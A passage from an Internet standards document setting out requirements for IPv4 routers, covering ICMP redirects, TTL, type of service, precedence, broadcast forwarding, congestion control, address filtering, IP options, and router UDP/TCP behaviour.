Routers that can generate Code 3 redirects (Host and Type of Service)
MUST have a configuration option (which defaults to on) to enable
Code 1 (Host) redirects to be substituted for Code 3 redirects. A
router MUST send a Code 1 Redirect in place of a Code 3 Redirect if
it has been configured to do so.

If a router is not able to generate Code 3 Redirects then it MUST
generate Code 1 Redirects in situations where a Code 3 Redirect is
called for.

Routers MUST NOT generate a Redirect Message unless all the following
conditions are met:

o The packet is being forwarded out the same physical interface that
it was received from,

o The IP source address in the packet is on the same Logical IP
(sub)network as the next-hop IP address, and

o The packet does not contain an IP source route option.

The source address used in the ICMP Redirect MUST belong to the same
logical (sub)net as the destination address.

A router using a routing protocol (other than static routes) MUST NOT
consider paths learned from ICMP Redirects when forwarding a packet.
If a router is not using a routing protocol, a router MAY have a

configuration that, if set, allows the router to consider routes
learned through ICMP Redirects when forwarding packets.

DISCUSSION
ICMP Redirect is a mechanism for routers to convey routing
information to hosts. Routers use other mechanisms to learn
routing information, and therefore have no reason to obey
redirects. Believing a redirect which contradicted the router's
other information would likely create routing loops.

On the other hand, when a router is not acting as a router, it
MUST comply with the behavior required of a host.

5.2.7.3 Time Exceeded

A router MUST generate a Time Exceeded message Code 0 (In Transit)
when it discards a packet due to an expired TTL field. A router MAY
have a per-interface option to disable origination of these messages
on that interface, but that option MUST default to allowing the
messages to be originated.

5.2.8 INTERNET GROUP MANAGEMENT PROTOCOL - IGMP

IGMP [INTERNET:4] is a protocol used between hosts and multicast
routers on a single physical network to establish hosts' membership
in particular multicast groups. Multicast routers use this
information, in conjunction with a multicast routing protocol, to
support IP multicast forwarding across the Internet.

A router SHOULD implement the multicast router part of IGMP.

5.3 SPECIFIC ISSUES

5.3.1 Time to Live (TTL)

The Time-to-Live (TTL) field of the IP header is defined to be a
timer limiting the lifetime of a datagram. It is an 8-bit field and
the units are seconds. Each router (or other module) that handles a
packet MUST decrement the TTL by at least one, even if the elapsed
time was much less than a second. Since this is very often the case,
the TTL is effectively a hop count limit on how far a datagram can
propagate through the Internet.

When a router forwards a packet, it MUST reduce the TTL by at least
one. If it holds a packet for more than one second, it MAY decrement
the TTL by one for each second.

If the TTL is reduced to zero (or less), the packet MUST be
discarded, and if the destination is not a multicast address the
router MUST send an ICMP Time Exceeded message, Code 0 (TTL Exceeded
in Transit) message to the source. Note that a router MUST NOT
discard an IP unicast or broadcast packet with a non-zero TTL merely
because it can predict that another router on the path to the
packet's final destination will decrement the TTL to zero. However,
a router MAY do so for IP multicasts, in order to more efficiently
implement IP multicast's expanding ring search algorithm (see
[INTERNET:4]).

DISCUSSION
The IP TTL is used, somewhat schizophrenically, as both a hop
count limit and a time limit. Its hop count function is critical
to ensuring that routing problems can't melt down the network by
causing packets to loop infinitely in the network. The time limit
function is used by transport protocols such as TCP to ensure
reliable data transfer. Many current implementations treat TTL as
a pure hop count, and in parts of the Internet community there is
a strong sentiment that the time limit function should instead be
performed by the transport protocols that need it.

In this specification, we have reluctantly decided to follow the
strong belief among the router vendors that the time limit
function should be optional. They argued that implementation of
the time limit function is difficult enough that it is currently
not generally done. They further pointed to the lack of
documented cases where this shortcut has caused TCP to corrupt
data (of course, we would expect the problems created to be rare
and difficult to reproduce, so the lack of documented cases
provides little reassurance that there haven't been a number of
undocumented cases).

IP multicast notions such as the expanding ring search may not
work as expected unless the TTL is treated as a pure hop count.
The same thing is somewhat true of traceroute.

ICMP Time Exceeded messages are required because the traceroute
diagnostic tool depends on them.

Thus, the tradeoff is between severely crippling, if not
eliminating, two very useful tools and avoiding a very rare and
transient data transport problem that may not occur at all. We
have chosen to preserve the tools.

5.3.2 Type of Service (TOS)

The Type-of-Service byte in the IP header is divided into three
sections: the Precedence field (high-order 3 bits), a field that
is customarily called Type of Service or "TOS (next 4 bits), and a
reserved bit (the low order bit). Rules governing the reserved
bit were described in Section [4.2.2.3]. The Precedence field
will be discussed in Section [5.3.3]. A more extensive discussion
of the TOS field and its use can be found in [ROUTE:11].

A router SHOULD consider the TOS field in a packet's IP header
when deciding how to forward it. The remainder of this section
describes the rules that apply to routers that conform to this
requirement.

A router MUST maintain a TOS value for each route in its routing
table. Routes learned through a routing protocol that does not
support TOS MUST be assigned a TOS of zero (the default TOS).

To choose a route to a destination, a router MUST use an algorithm
equivalent to the following:

(1) The router locates in its routing table all available routes
to the destination (see Section [5.2.4]).

(2) If there are none, the router drops the packet because the
destination is unreachable. See section [5.2.4].

(3) If one or more of those routes have a TOS that exactly matches
the TOS specified in the packet, the router chooses the route
with the best metric.

(4) Otherwise, the router repeats the above step, except looking
at routes whose TOS is zero.

(5) If no route was chosen above, the router drops the packet
because the destination is unreachable. The router returns
an ICMP Destination Unreachable error specifying the
appropriate code: either Network Unreachable with Type of
Service (code 11) or Host Unreachable with Type of Service
(code 12).

DISCUSSION
Although TOS has been little used in the past, its use by hosts is
now mandated by the Requirements for Internet Hosts RFCs
([INTRO:2] and [INTRO:3]). Support for TOS in routers may become
a MUST in the future, but is a SHOULD for now until we get more
experience with it and can better judge both its benefits and its
costs.

Various people have proposed that TOS should affect other aspects
of the forwarding function. For example:

(1) A router could place packets that have the Low Delay bit set
ahead of other packets in its output queues.

(2) a router is forced to discard packets, it could try to avoid
discarding those which have the High Reliability bit set.

These ideas have been explored in more detail in [INTERNET:17] but
we don't yet have enough experience with such schemes to make
requirements in this area.

5.3.3 IP Precedence

This section specifies requirements and guidelines for appropriate
processing of the IP Precedence field in routers. Precedence is a
scheme for allocating resources in the network based on the
relative importance of different traffic flows. The IP
specification defines specific values to be used in this field for
various types of traffic.

The basic mechanisms for precedence processing in a router are
preferential resource allocation, including both precedence-
ordered queue service and precedence-based congestion control, and
selection of Link Layer priority features. The router also
selects the IP precedence for routing, management and control
traffic it originates. For a more extensive discussion of IP
Precedence and its implementation see [FORWARD:6].

Precedence-ordered queue service, as discussed in this section,
includes but is not limited to the queue for the forwarding
process and queues for outgoing links. It is intended that a

router supporting precedence should also use the precedence
indication at whatever points in its processing are concerned with
allocation of finite resources, such as packet buffers or Link
Layer connections. The set of such points is implementation-
dependent.

DISCUSSION
Although the Precedence field was originally provided for use in
DOD systems where large traffic surges or major damage to the
network are viewed as inherent threats, it has useful applications
for many non-military IP networks. Although the traffic handling
capacity of networks has grown greatly in recent years, the
traffic generating ability of the users has also grown, and
network overload conditions still occur at times. Since IP-based
routing and management protocols have become more critical to the
successful operation of the Internet, overloads present two
additional risks to the network:

(1) High delays may result in routing protocol packets being lost.
This may cause the routing protocol to falsely deduce a
topology change and propagate this false information to other
routers. Not only can this cause routes to oscillate, but an
extra processing burden may be placed on other routers.

(2) High delays may interfere with the use of network management
tools to analyze and perhaps correct or relieve the problem
in the network that caused the overload condition to occur.

Implementation and appropriate use of the Precedence mechanism
alleviates both of these problems.

5.3.3.1 Precedence-Ordered Queue Service

Routers SHOULD implement precedence-ordered queue service.
Precedence-ordered queue service means that when a packet is selected
for output on a (logical) link, the packet of highest precedence that
has been queued for that link is sent. Routers that implement
precedence-ordered queue service MUST also have a configuration
option to suppress precedence-ordered queue service in the Internet
Layer.

Any router MAY implement other policy-based throughput management
procedures that result in other than strict precedence ordering, but
it MUST be configurable to suppress them (i.e., use strict ordering).

As detailed in Section [5.3.6], routers that implement precedence-
ordered queue service discard low precedence packets before
discarding high precedence packets for congestion control purposes.

Preemption (interruption of processing or transmission of a packet)
is not envisioned as a function of the Internet Layer. Some
protocols at other layers may provide preemption features.

5.3.3.2 Lower Layer Precedence Mappings

Routers that implement precedence-ordered queuing MUST IMPLEMENT, and
other routers SHOULD IMPLEMENT, Lower Layer Precedence Mapping.

A router that implements Lower Layer Precedence Mapping:

o MUST be able to map IP Precedence to Link Layer priority mechanisms
for link layers that have such a feature defined.

o MUST have a configuration option to select the Link Layer's default
priority treatment for all IP traffic

o SHOULD be able to configure specific nonstandard mappings of IP
precedence values to Link Layer priority values for each
interface.

DISCUSSION
Some research questions the workability of the priority features
of some Link Layer protocols, and some networks may have faulty
implementations of the link layer priority mechanism. It seems
prudent to provide an escape mechanism in case such problems show
up in a network.

On the other hand, there are proposals to use novel queuing
strategies to implement special services such as multimedia
bandwidth reservation or low-delay service. Special services and
queuing strategies to support them are current research subjects
and are in the process of standardization.

Implementors may wish to consider that correct link layer mapping
of IP precedence is required by DOD policy for TCP/IP systems used
on DOD networks. Since these requirements are intended to
encourage (but not force) the use of precedence features in the
hope of providing better Internet service to all users, routers
supporting precedence-ordered queue service should default to
maintaining strict precedence ordering regardless of the type of
service requested.

5.3.3.3 Precedence Handling For All Routers

A router (whether or not it employs precedence-ordered queue
service):

(1) MUST accept and process incoming traffic of all precedence levels
normally, unless it has been administratively configured to do
otherwise.

(2) MAY implement a validation filter to administratively restrict
the use of precedence levels by particular traffic sources. If
provided, this filter MUST NOT filter out or cut off the
following sorts of ICMP error messages: Destination Unreachable,
Redirect, Time Exceeded, and Parameter Problem. If this filter
is provided, the procedures required for packet filtering by
addresses are required for this filter also.

DISCUSSION
Precedence filtering should be applicable to specific
source/destination IP Address pairs, specific protocols, specific
ports, and so on.

An ICMP Destination Unreachable message with code 14 SHOULD be sent
when a packet is dropped by the validation filter, unless this has
been suppressed by configuration choice.

(3) MAY implement a cutoff function that allows the router to be set
to refuse or drop traffic with precedence below a specified
level. This function may be activated by management actions or
by some implementation dependent heuristics, but there MUST be a
configuration option to disable any heuristic mechanism that
operates without human intervention. An ICMP Destination
Unreachable message with code 15 SHOULD be sent when a packet is
dropped by the cutoff function, unless this has been suppressed
by configuration choice.

A router MUST NOT refuse to forward datagrams with IP precedence
of 6 (Internetwork Control) or 7 (Network Control) solely due to
precedence cutoff. However, other criteria may be used in
conjunction with precedence cutoff to filter high precedence
traffic.

DISCUSSION
Unrestricted precedence cutoff could result in an unintentional
cutoff of routing and control traffic. In the general case, host
traffic should be restricted to a value of 5 (CRITIC/ECP) or
below; this is not a requirement and may not be correct in certain
systems.

(4) MUST NOT change precedence settings on packets it did not
originate.

(5) SHOULD be able to configure distinct precedence values to be used
for each routing or management protocol supported (except for
those protocols, such as OSPF, which specify which precedence
value must be used).

(6) MAY be able to configure routing or management traffic precedence
values independently for each peer address.

(7) MUST respond appropriately to Link Layer precedence-related error
indications where provided. An ICMP Destination Unreachable
message with code 15 SHOULD be sent when a packet is dropped
because a link cannot accept it due to a precedence-related
condition, unless this has been suppressed by configuration
choice.

DISCUSSION
The precedence cutoff mechanism described in (3) is somewhat
controversial. Depending on the topological location of the area
affected by the cutoff, transit traffic may be directed by routing
protocols into the area of the cutoff, where it will be dropped.
This is only a problem if another path that is unaffected by the
cutoff exists between the communicating points. Proposed ways of
avoiding this problem include providing some minimum bandwidth to
all precedence levels even under overload conditions, or
propagating cutoff information in routing protocols. In the
absence of a widely accepted (and implemented) solution to this
problem, great caution is recommended in activating cutoff
mechanisms in transit networks.

A transport layer relay could legitimately provide the function
prohibited by (4) above. Changing precedence levels may cause
subtle interactions with TCP and perhaps other protocols; a
correct design is a non-trivial task.

The intent of (5) and (6) (and the discussion of IP Precedence in
ICMP messages in Section [4.3.2]) is that the IP precedence bits
should be appropriately set, whether or not this router acts upon
those bits in any other way. We expect that in the future
specifications for routing protocols and network management
protocols will specify how the IP Precedence should be set for
messages sent by those protocols.

The appropriate response for (7) depends on the link layer
protocol in use. Typically, the router should stop trying to send
offensive traffic to that destination for some period of time, and

should return an ICMP Destination Unreachable message with code 15
(service not available for precedence requested) to the traffic
source. It also should not try to reestablish a preempted Link
Layer connection for some time.

5.3.4 Forwarding of Link Layer Broadcasts

The encapsulation of IP packets in most Link Layer protocols (except
PPP) allows a receiver to distinguish broadcasts and multicasts from
unicasts simply by examining the Link Layer protocol headers (most
commonly, the Link Layer destination address). The rules in this
section that refer to Link Layer broadcasts apply only to Link Layer
protocols that allow broadcasts to be distinguished; likewise, the
rules that refer to Link Layer multicasts apply only to Link Layer
protocols that allow multicasts to be distinguished.

A router MUST NOT forward any packet that the router received as a
Link Layer broadcast, unless it is directed to an IP Multicast
address. In this latter case, one would presume that link layer
broadcast was used due to the lack of an effective multicast service.

A router MUST NOT forward any packet which the router received as a
Link Layer multicast unless the packet's destination address is an IP
multicast address.

A router SHOULD silently discard a packet that is received via a Link
Layer broadcast but does not specify an IP multicast or IP broadcast
destination address.

When a router sends a packet as a Link Layer broadcast, the IP
destination address MUST be a legal IP broadcast or IP multicast
address.

5.3.5 Forwarding of Internet Layer Broadcasts

There are two major types of IP broadcast addresses; limited
broadcast and directed broadcast. In addition, there are three
subtypes of directed broadcast: a broadcast directed to a specified
network prefix, a broadcast directed to a specified subnetwork, and a
broadcast directed to all subnets of a specified network.
Classification by a router of a broadcast into one of these
categories depends on the broadcast address and on the router's
understanding (if any) of the subnet structure of the destination
network. The same broadcast will be classified differently by
different routers.

A limited IP broadcast address is defined to be all-ones: { -1, -1 }
or 255.255.255.255.

A network-prefix-directed broadcast is composed of the network prefix
of the IP address with a local part of all-ones or { prefix>, -1 }. For example, a Class A net broadcast address is
net.255.255.255, a Class B net broadcast address is net.net.255.255
and a Class C net broadcast address is net.net.net.255 where net is a
byte of the network address.

The all-subnets-directed-broadcast is not well defined in a CIDR
environment, and was deprecated in version 1 of this memo.

As was described in Section [4.2.3.1], a router may encounter certain
non-standard IP broadcast addresses:

o 0.0.0.0 is an obsolete form of the limited broadcast address

o { , 0 } is an obsolete form of a network-prefix-
directed broadcast address.

As was described in that section, packets addressed to any of these
addresses SHOULD be silently discarded, but if they are not, they
MUST be treated according to the same rules that apply to packets
addressed to the non-obsolete forms of the broadcast addresses
described above. These rules are described in the next few sections.

5.3.5.1 Limited Broadcasts

Limited broadcasts MUST NOT be forwarded. Limited broadcasts MUST
NOT be discarded. Limited broadcasts MAY be sent and SHOULD be sent
instead of directed broadcasts where limited broadcasts will suffice.

DISCUSSION
Some routers contain UDP servers which function by resending the
requests (as unicasts or directed broadcasts) to other servers.
This requirement should not be interpreted as prohibiting such
servers. Note, however, that such servers can easily cause packet
looping if misconfigured. Thus, providers of such servers would
probably be well advised to document their setup carefully and to
consider carefully the TTL on packets that are sent.

5.3.5.2 Directed Broadcasts

A router MUST classify as network-prefix-directed broadcasts all
valid, directed broadcasts destined for a remote network or an
attached nonsubnetted network. Note that in view of CIDR, such
appear to be host addresses within the network prefix; we preclude
inspection of the host part of such network prefixes. Given a route
and no overriding policy, then, a router MUST forward network-
prefix-directed broadcasts. Network-Prefix-Directed broadcasts MAY

be sent.

A router MAY have an option to disable receiving network-prefix-
directed broadcasts on an interface and MUST have an option to
disable forwarding network-prefix-directed broadcasts. These options
MUST default to permit receiving and forwarding network-prefix-
directed broadcasts.

DISCUSSION
There has been some debate about forwarding or not forwarding
directed broadcasts. In this memo we have made the forwarding
decision depend on the router's knowledge of the destination
network prefix. Routers cannot determine that a message is
unicast or directed broadcast apart from this knowledge. The
decision to forward or not forward the message is by definition
only possible in the last hop router.

5.3.5.3 All-subnets-directed Broadcasts

The first version of this memo described an algorithm for
distributing a directed broadcast to all the subnets of a classical
network number. This algorithm was stated to be "broken," and
certain failure cases were specified.

In a CIDR routing domain, wherein classical IP network numbers are
meaningless, the concept of an all-subnets-directed-broadcast is also
meaningless. To the knowledge of the working group, the facility was
never implemented or deployed, and is now relegated to the dustbin of
history.

5.3.5.4 Subnet-directed Broadcasts

The first version of this memo spelled out procedures for dealing
with subnet-directed-broadcasts. In a CIDR routing domain, these are
indistinguishable from net-drected-broadcasts. The two are therefore
treated together in section [5.3.5.2 Directed Broadcasts], and should
be viewed as network-prefix directed broadcasts.

5.3.6 Congestion Control

Congestion in a network is loosely defined as a condition where
demand for resources (usually bandwidth or CPU time) exceeds
capacity. Congestion avoidance tries to prevent demand from
exceeding capacity, while congestion recovery tries to restore an
operative state. It is possible for a router to contribute to both
of these mechanisms. A great deal of effort has been spent studying
the problem. The reader is encouraged to read [FORWARD:2] for a
survey of the work. Important papers on the subject include

[FORWARD:3], [FORWARD:4], [FORWARD:5], [FORWARD:10], [FORWARD:11],
[FORWARD:12], [FORWARD:13], [FORWARD:14], and [INTERNET:10], among
others.

The amount of storage that router should have available to handle
peak instantaneous demand when hosts use reasonable congestion
policies, such as described in [FORWARD:5], is a function of the
product of the bandwidth of the link times the path delay of the
flows using the link, and therefore storage should increase as this
Bandwidth*Delay product increases. The exact function relating
storage capacity to probability of discard is not known.

When a router receives a packet beyond its storage capacity it must
(by definition, not by decree) discard it or some other packet or
packets. Which packet to discard is the subject of much study but,
unfortunately, little agreement so far. The best wisdom to date
suggests discarding a packet from the data stream most heavily using
the link. However, a number of additional factors may be relevant,
including the precedence of the traffic, active bandwidth
reservation, and the complexity associated with selecting that
packet.

A router MAY discard the packet it has just received; this is the
simplest but not the best policy. Ideally, the router should select
a packet from one of the sessions most heavily abusing the link,
given that the applicable Quality of Service policy permits this. A
recommended policy in datagram environments using FIFO queues is to
discard a packet randomly selected from the queue (see [FORWARD:5]).
An equivalent algorithm in routers using fair queues is to discard
from the longest queue or that using the greatest virtual time (see
[FORWARD:13]). A router MAY use these algorithms to determine which
packet to discard.

If a router implements a discard policy (such as Random Drop) under
which it chooses a packet to discard from a pool of eligible packets:

o If precedence-ordered queue service (described in Section
[5.3.3.1]) is implemented and enabled, the router MUST NOT discard
a packet whose IP precedence is higher than that of a packet that
is not discarded.

o A router MAY protect packets whose IP headers request the maximize
reliability TOS, except where doing so would be in violation of
the previous rule.

o A router MAY protect fragmented IP packets, on the theory that
dropping a fragment of a datagram may increase congestion by
causing all fragments of the datagram to be retransmitted by the

source.

o To help prevent routing perturbations or disruption of management
functions, the router MAY protect packets used for routing
control, link control, or network management from being discarded.
Dedicated routers (i.e., routers that are not also general purpose
hosts, terminal servers, etc.) can achieve an approximation of
this rule by protecting packets whose source or destination is the
router itself.

Advanced methods of congestion control include a notion of fairness,
so that the 'user' that is penalized by losing a packet is the one
that contributed the most to the congestion. No matter what
mechanism is implemented to deal with bandwidth congestion control,
it is important that the CPU effort expended be sufficiently small
that the router is not driven into CPU congestion also.

As described in Section [4.3.3.3], this document recommends that a
router SHOULD NOT send a Source Quench to the sender of the packet
that it is discarding. ICMP Source Quench is a very weak mechanism,
so it is not necessary for a router to send it, and host software
should not use it exclusively as an indicator of congestion.

5.3.7 Martian Address Filtering

An IP source address is invalid if it is a special IP address, as
defined in 4.2.2.11 or 5.3.7, or is not a unicast address.

An IP destination address is invalid if it is among those defined as
illegal destinations in 4.2.3.1, or is a Class E address (except
255.255.255.255).

A router SHOULD NOT forward any packet that has an invalid IP source
address or a source address on network 0. A router SHOULD NOT
forward, except over a loopback interface, any packet that has a
source address on network 127. A router MAY have a switch that
allows the network manager to disable these checks. If such a switch
is provided, it MUST default to performing the checks.

A router SHOULD NOT forward any packet that has an invalid IP
destination address or a destination address on network 0. A router
SHOULD NOT forward, except over a loopback interface, any packet that
has a destination address on network 127. A router MAY have a switch
that allows the network manager to disable these checks. If such a
switch is provided, it MUST default to performing the checks.

If a router discards a packet because of these rules, it SHOULD log
at least the IP source address, the IP destination address, and, if

the problem was with the source address, the physical interface on
which the packet was received and the Link Layer address of the host
or router from which the packet was received.

5.3.8 Source Address Validation

A router SHOULD IMPLEMENT the ability to filter traffic based on a
comparison of the source address of a packet and the forwarding table
for a logical interface on which the packet was received. If this
filtering is enabled, the router MUST silently discard a packet if
the interface on which the packet was received is not the interface
on which a packet would be forwarded to reach the address contained
in the source address. In simpler terms, if a router wouldn't route
a packet containing this address through a particular interface, it
shouldn't believe the address if it appears as a source address in a
packet read from this interface.

If this feature is implemented, it MUST be disabled by default.

DISCUSSION
This feature can provide useful security improvements in some
situations, but can erroneously discard valid packets in
situations where paths are asymmetric.

5.3.9 Packet Filtering and Access Lists

As a means of providing security and/or limiting traffic through
portions of a network a router SHOULD provide the ability to
selectively forward (or filter) packets. If this capability is
provided, filtering of packets SHOULD be configurable either to
forward all packets or to selectively forward them based upon the
source and destination prefixes, and MAY filter on other message
attributes. Each source and destination address SHOULD allow
specification of an arbitrary prefix length.

DISCUSSION
This feature can provide a measure of privacy, where systems
outside a boundary are not permitted to exchange certain protocols
with systems inside the boundary, or are limited as to which
systems they may communicate with. It can also help prevent
certain classes of security breach, wherein a system outside a
boundary masquerades as a system inside the boundary and mimics a
session with it.

If supported, a router SHOULD be configurable to allow one of an

o Include list - specification of a list of message definitions to be
forwarded, or an

o Exclude list - specification of a list of message definitions NOT
to be forwarded.

A "message definition", in this context, specifies the source and
destination network prefix, and may include other identifying
information such as IP Protocol Type or TCP port number.

A router MAY provide a configuration switch that allows a choice
between specifying an include or an exclude list, or other equivalent
controls.

A value matching any address (e.g., a keyword any, an address with a
mask of all 0's, or a network prefix whose length is zero) MUST be
allowed as a source and/or destination address.

In addition to address pairs, the router MAY allow any combination of
transport and/or application protocol and source and destination
ports to be specified.

The router MUST allow packets to be silently discarded (i.e.,
discarded without an ICMP error message being sent).

The router SHOULD allow an appropriate ICMP unreachable message to be
sent when a packet is discarded. The ICMP message SHOULD specify
Communication Administratively Prohibited (code 13) as the reason for
the destination being unreachable.

The router SHOULD allow the sending of ICMP destination unreachable
messages (code 13) to be configured for each combination of address
pairs, protocol types, and ports it allows to be specified.

The router SHOULD count and SHOULD allow selective logging of packets
not forwarded.

5.3.10 Multicast Routing

An IP router SHOULD support forwarding of IP multicast packets, based
either on static multicast routes or on routes dynamically determined
by a multicast routing protocol (e.g., DVMRP [ROUTE:9]). A router
that forwards IP multicast packets is called a multicast router.

5.3.11 Controls on Forwarding

For each physical interface, a router SHOULD have a configuration
option that specifies whether forwarding is enabled on that
interface. When forwarding on an interface is disabled, the router:

o MUST silently discard any packets which are received on that
interface but are not addressed to the router

o MUST NOT send packets out that interface, except for datagrams
originated by the router

o MUST NOT announce via any routing protocols the availability of
paths through the interface

DISCUSSION
This feature allows the network manager to essentially turn off an
interface but leaves it accessible for network management.

Ideally, this control would apply to logical rather than physical
interfaces. It cannot, because there is no known way for a router
to determine which logical interface a packet arrived absent a
one-to-one correspondence between logical and physical interfaces.

5.3.12 State Changes

During router operation, interfaces may fail or be manually disabled,
or may become available for use by the router. Similarly, forwarding
may be disabled for a particular interface or for the entire router
or may be (re)enabled. While such transitions are (usually)
uncommon, it is important that routers handle them correctly.

5.3.12.1 When a Router Ceases Forwarding

When a router ceases forwarding it MUST stop advertising all routes,
except for third party routes. It MAY continue to receive and use
routes from other routers in its routing domains. If the forwarding
database is retained, the router MUST NOT cease timing the routes in
the forwarding database. If routes that have been received from
other routers are remembered, the router MUST NOT cease timing the
routes that it has remembered. It MUST discard any routes whose
timers expire while forwarding is disabled, just as it would do if
forwarding were enabled.

DISCUSSION
When a router ceases forwarding, it essentially ceases being a
router. It is still a host, and must follow all of the
requirements of Host Requirements [INTRO:2]. The router may still
be a passive member of one or more routing domains, however. As
such, it is allowed to maintain its forwarding database by
listening to other routers in its routing domain. It may not,
however, advertise any of the routes in its forwarding database,
since it itself is doing no forwarding. The only exception to
this rule is when the router is advertising a route that uses only

some other router, but which this router has been asked to
advertise.

A router MAY send ICMP destination unreachable (host unreachable)
messages to the senders of packets that it is unable to forward. It
SHOULD NOT send ICMP redirect messages.

DISCUSSION
Note that sending an ICMP destination unreachable (host
unreachable) is a router action. This message should not be sent
by hosts. This exception to the rules for hosts is allowed so
that packets may be rerouted in the shortest possible time, and so
that black holes are avoided.

5.3.12.2 When a Router Starts Forwarding

When a router begins forwarding, it SHOULD expedite the sending of
new routing information to all routers with which it normally
exchanges routing information.

5.3.12.3 When an Interface Fails or is Disabled

If an interface fails or is disabled a router MUST remove and stop
advertising all routes in its forwarding database that make use of
that interface. It MUST disable all static routes that make use of
that interface. If other routes to the same destination and TOS are
learned or remembered by the router, the router MUST choose the best
alternate, and add it to its forwarding database. The router SHOULD
send ICMP destination unreachable or ICMP redirect messages, as
appropriate, in reply to all packets that it is unable to forward due
to the interface being unavailable.

5.3.12.4 When an Interface is Enabled

If an interface that had not been available becomes available, a
router MUST reenable any static routes that use that interface. If
routes that would use that interface are learned by the router, then
these routes MUST be evaluated along with all the other learned
routes, and the router MUST make a decision as to which routes should
be placed in the forwarding database. The implementor is referred to
Chapter [7], Application Layer - Routing Protocols for further
information on how this decision is made.

A router SHOULD expedite the sending of new routing information to
all routers with which it normally exchanges routing information.

5.3.13 IP Options

Several options, such as Record Route and Timestamp, contain slots
into which a router inserts its address when forwarding the packet.
However, each such option has a finite number of slots, and therefore
a router may find that there is not free slot into which it can
insert its address. No requirement listed below should be construed
as requiring a router to insert its address into an option that has
no remaining slot to insert it into. Section [5.2.5] discusses how a
router must choose which of its addresses to insert into an option.

5.3.13.1 Unrecognized Options Unrecognized IP options in forwarded
packets MUST be passed through unchanged.

5.3.13.2 Security Option

Some environments require the Security option in every packet; such a
requirement is outside the scope of this document and the IP standard
specification. Note, however, that the security options described in
[INTERNET:1] and [INTERNET:16] are obsolete. Routers SHOULD
IMPLEMENT the revised security option described in [INTERNET:5].

DISCUSSION
Routers intended for use in networks with multiple security levels
should support packet filtering based on IPSO (RFC-1108) labels.
To implement this support, the router would need to permit the
router administrator to configure both a lower sensitivity limit
(e.g. Unclassified) and an upper sensitivity limit (e.g. Secret)
on each interface. It is commonly but not always the case that
the two limits are the same (e.g. a single-level interface).
Packets caught by an IPSO filter as being out of range should be
silently dropped and a counter should note the number of packets
dropped because of out of range IPSO labels.

5.3.13.3 Stream Identifier Option

This option is obsolete. If the Stream Identifier option is present
in a packet forwarded by the router, the option MUST be ignored and
passed through unchanged.

5.3.13.4 Source Route Options

A router MUST implement support for source route options in forwarded
packets. A router MAY implement a configuration option that, when
enabled, causes all source-routed packets to be discarded. However,
such an option MUST NOT be enabled by default.

DISCUSSION
The ability to source route datagrams through the Internet is
important to various network diagnostic tools. However, source
routing may be used to bypass administrative and security controls
within a network. Specifically, those cases where manipulation of
routing tables is used to provide administrative separation in
lieu of other methods such as packet filtering may be vulnerable
through source routed packets.

EDITORS+COMMENTS
Packet filtering can be defeated by source routing as well, if it
is applied in any router except one on the final leg of the source
routed path. Neither route nor packet filters constitute a
complete solution for security.

5.3.13.5 Record Route Option

Routers MUST support the Record Route option in forwarded packets.

A router MAY provide a configuration option that, if enabled, will
cause the router to ignore (i.e., pass through unchanged) Record
Route options in forwarded packets. If provided, such an option MUST
default to enabling the record-route. This option should not affect
the processing of Record Route options in datagrams received by the
router itself (in particular, Record Route options in ICMP echo
requests will still be processed according to Section [4.3.3.6]).

DISCUSSION
There are some people who believe that Record Route is a security
problem because it discloses information about the topology of the
network. Thus, this document allows it to be disabled.

5.3.13.6 Timestamp Option

Routers MUST support the timestamp option in forwarded packets. A
timestamp value MUST follow the rules given [INTRO:2].

If the flags field = 3 (timestamp and prespecified address), the
router MUST add its timestamp if the next prespecified address
matches any of the router's IP addresses. It is not necessary that
the prespecified address be either the address of the interface on
which the packet arrived or the address of the interface over which
it will be sent.

IMPLEMENTATION
To maximize the utility of the timestamps contained in the
timestamp option, it is suggested that the timestamp inserted be,
as nearly as practical, the time at which the packet arrived at

the router. For datagrams originated by the router, the timestamp
inserted should be, as nearly as practical, the time at which the
datagram was passed to the network layer for transmission.

A router MAY provide a configuration option which, if enabled, will
cause the router to ignore (i.e., pass through unchanged) Timestamp
options in forwarded datagrams when the flag word is set to zero
(timestamps only) or one (timestamp and registering IP address). If
provided, such an option MUST default to off (that is, the router
does not ignore the timestamp). This option should not affect the
processing of Timestamp options in datagrams received by the router
itself (in particular, a router will insert timestamps into Timestamp
options in datagrams received by the router, and Timestamp options in
ICMP echo requests will still be processed according to Section
[4.3.3.6]).

DISCUSSION
Like the Record Route option, the Timestamp option can reveal
information about a network's topology. Some people consider this
to be a security concern.

6. TRANSPORT LAYER

A router is not required to implement any Transport Layer protocols
except those required to support Application Layer protocols
supported by the router. In practice, this means that most routers
implement both the Transmission Control Protocol (TCP) and the User
Datagram Protocol (UDP).

6.1 USER DATAGRAM PROTOCOL - UDP

The User Datagram Protocol (UDP) is specified in [TRANS:1].

A router that implements UDP MUST be compliant, and SHOULD be
unconditionally compliant, with the requirements of [INTRO:2], except
that:

o This specification does not specify the interfaces between the
various protocol layers. Thus, a router's interfaces need not
comply with [INTRO:2], except where compliance is required for
proper functioning of Application Layer protocols supported by the
router.

o Contrary to [INTRO:2], an application SHOULD NOT disable generation
of UDP checksums.

DISCUSSION
Although a particular application protocol may require that UDP
datagrams it receives must contain a UDP checksum, there is no
general requirement that received UDP datagrams contain UDP
checksums. Of course, if a UDP checksum is present in a received
datagram, the checksum must be verified and the datagram discarded
if the checksum is incorrect.

6.2 TRANSMISSION CONTROL PROTOCOL - TCP

The Transmission Control Protocol (TCP) is specified in [TRANS:2].

A router that implements TCP MUST be compliant, and SHOULD be
unconditionally compliant, with the requirements of [INTRO:2], except
that:

o This specification does not specify the interfaces between the
various protocol layers. Thus, a router need not comply with the
following requirements of [INTRO:2] (except of course where
compliance is required for proper functioning of Application Layer
protocols supported by the router):

Use of Push: RFC-793 Section 2.8:
Passing a received PSH flag to the application layer is now
OPTIONAL.

Urgent Pointer: RFC-793 Section 3.1:
A TCP MUST inform the application layer asynchronously
whenever it receives an Urgent pointer and there was
previously no pending urgent data, or whenever the Urgent
pointer advances in the data stream. There MUST be a way for
the application to learn how much urgent data remains to be
read from the connection, or at least to determine whether or
not more urgent data remains to be read.

TCP Connection Failures:
An application MUST be able to set the value for R2 for a
particular connection. For example, an interactive
application might set R2 to ``infinity,'' giving the user
control over when to disconnect.

TCP Multihoming:
If an application on a multihomed host does not specify the
local IP address when actively opening a TCP connection, then
the TCP MUST ask the IP layer to select a local IP address
before sending the (first) SYN. See the function
GET_SRCADDR() in Section 3.4.

IP Options:
An application MUST be able to specify a source route when it
actively opens a TCP connection, and this MUST take
precedence over a source route received in a datagram.

o For similar reasons, a router need not comply with any of the
requirements of [INTRO:2].

